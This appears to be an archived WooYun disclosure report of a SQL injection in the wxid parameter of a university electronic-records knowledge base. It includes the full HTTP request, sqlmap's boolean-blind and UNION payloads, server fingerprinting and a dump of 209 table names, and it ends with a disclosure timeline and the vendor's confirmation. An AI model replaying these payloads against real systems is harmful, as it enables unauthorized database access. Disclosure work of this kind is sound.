乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-14: 细节已通知厂商并且等待厂商处理中 2015-04-15: 厂商已经确认,细节仅向厂商公开 2015-04-25: 细节向核心白帽子及相关领域专家公开 2015-05-05: 细节向普通白帽子公开 2015-05-15: 细节向实习白帽子公开 2015-05-30: 细节向公众公开
http://erm-kbs.ruc.edu.cn/
电子文件管理知识库,存在SQL注入
POST /ext/getwx.ashx?t=info HTTP/1.1Content-Length: 99Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://erm-kbs.ruc.edu.cn:80/Ext/WxDetail.aspx?type=50&id=d9ef9331-1aae-46fd-85f5-956711b5f083Host: erm-kbs.ruc.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*wxid=d9ef9331-1aae-46fd-85f5-956711b5f083&wxtype=50
wxid参数
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: wxid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: wxid=d9ef9331-1aae-46fd-85f5-956711b5f083' AND 4059=4059 AND 'uPCZ'='uPCZ&wxtype=50 Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: wxid=d9ef9331-1aae-46fd-85f5-956711b5f083' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(113)+CHAR(120)+CHAR(102)+CHAR(69)+CHAR(82)+CHAR(81)+CHAR(87)+CHAR(67)+CHAR(66)+CHAR(111)+CHAR(86)+CHAR(113)+CHAR(119)+CHAR(110)+CHAR(111)+CHAR(113),NULL-- &wxtype=50---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: renda[209 tables]+---------------------------+| DB_FWQPZ || DB_SHAITU || DB_ZDDY || DB_ZDDYPZ || D_FGF || D_FLB || D_PZK || Droit_Item || DropMessages || F_TABLE || FullTextIndexFiles || FullTextIndexFiles_backup || GROUPS || Info2kGetDwg || InfoSysDocument || OA_INFO || OPERATORS || RIGHT_LIST || RIGHT_TREE || S_AUTOSET || S_BORROW_1 || S_DALX || S_GLMS || S_KUFANG_1 || S_LOG || S_MLINdex || S_MLS || S_QZH || S_REPORT || S_TJPROJECT || TMP_S_BORROW_1 || UserCounter || code01dict || code02dict || code11dict || code12dict || code15dict || code16dict || code17dict || code18dict || code19dict || code20dict || code21dict || code22dict || code23dict || code24dict || code25dict || code26dict || code27dict || code28dict || code29dict || code30dict || code31dict || code32dict || code33dict || code34dict || code35dict || code36dict || code37dict || code38dict || codetypedict || datatable102 || datatable103 || datatable104 || datatable105 || datatable106 || datatable107 || datatable109 || datatable111 || datatable114 || datatable115 || datatable116 || datatable117 || datatable118 || datatable119 || datatable120 || datatable121 || datatable85 || datatable86 || datatable87 || datatable88 || datatable89 || datatable90 || destroy_datatable102 || destroy_datatable103 || destroy_datatable104 || destroy_datatable105 || destroy_datatable106 || destroy_datatable107 || destroy_datatable109 || destroy_datatable111 || destroy_datatable114 || destroy_datatable115 || destroy_datatable116 || destroy_datatable117 || destroy_datatable118 || destroy_datatable119 || destroy_datatable120 || destroy_datatable121 || destroy_datatable85 || destroy_datatable86 || destroy_datatable87 || destroy_datatable88 || destroy_datatable89 || destroy_datatable90 || destroy_sw || dtproperties || e_datatable102 || e_datatable103 || e_datatable104 || e_datatable105 || e_datatable106 || e_datatable107 || e_datatable109 || e_datatable111 || e_datatable114 || e_datatable115 || e_datatable116 || e_datatable117 || e_datatable118 || e_datatable119 || e_datatable120 || e_datatable121 || e_datatable85 || e_datatable86 || e_datatable87 || e_datatable88 || e_datatable89 || e_datatable90 || e_destroy_datatable102 || e_destroy_datatable103 || e_destroy_datatable104 || e_destroy_datatable105 || e_destroy_datatable106 || e_destroy_datatable107 || e_destroy_datatable109 || e_destroy_datatable111 || e_destroy_datatable114 || e_destroy_datatable115 || e_destroy_datatable116 || e_destroy_datatable117 || e_destroy_datatable118 || e_destroy_datatable119 || e_destroy_datatable120 || e_destroy_datatable121 || e_destroy_datatable85 || e_destroy_datatable86 || e_destroy_datatable87 || e_destroy_datatable88 || e_destroy_datatable89 || e_destroy_datatable90 || eplotjiekou || fafangcode || jiekou || plot_info || right_detail || s_Condition || s_kufanginfo || s_mkset || s_userset || s_xtpxzd || tableform || tmp_datatable102 || tmp_datatable103 || tmp_datatable104 || tmp_datatable105 || tmp_datatable106 || tmp_datatable107 || tmp_datatable109 || tmp_datatable111 || tmp_datatable114 || tmp_datatable115 || tmp_datatable116 || tmp_datatable117 || tmp_datatable118 || tmp_datatable119 || tmp_datatable120 || tmp_datatable121 || tmp_datatable85 || tmp_datatable86 || tmp_datatable87 || tmp_datatable88 || tmp_datatable89 || tmp_datatable90 || tsqx || usertbl || userwebqx || view_datatable102 || view_datatable103 || view_datatable104 || view_datatable105 || view_datatable106 || view_datatable107 || view_datatable109 || view_datatable111 || view_datatable114 || view_datatable115 || view_datatable116 || view_datatable117 || view_datatable118 || view_datatable119 || view_datatable120 || view_datatable121 || view_datatable85 || view_datatable86 || view_datatable87 || view_datatable88 || view_datatable89 || view_datatable90 |+---------------------------+
危害等级:中
漏洞Rank:8
确认时间:2015-04-15 09:24
非常感谢!已通知。
暂无
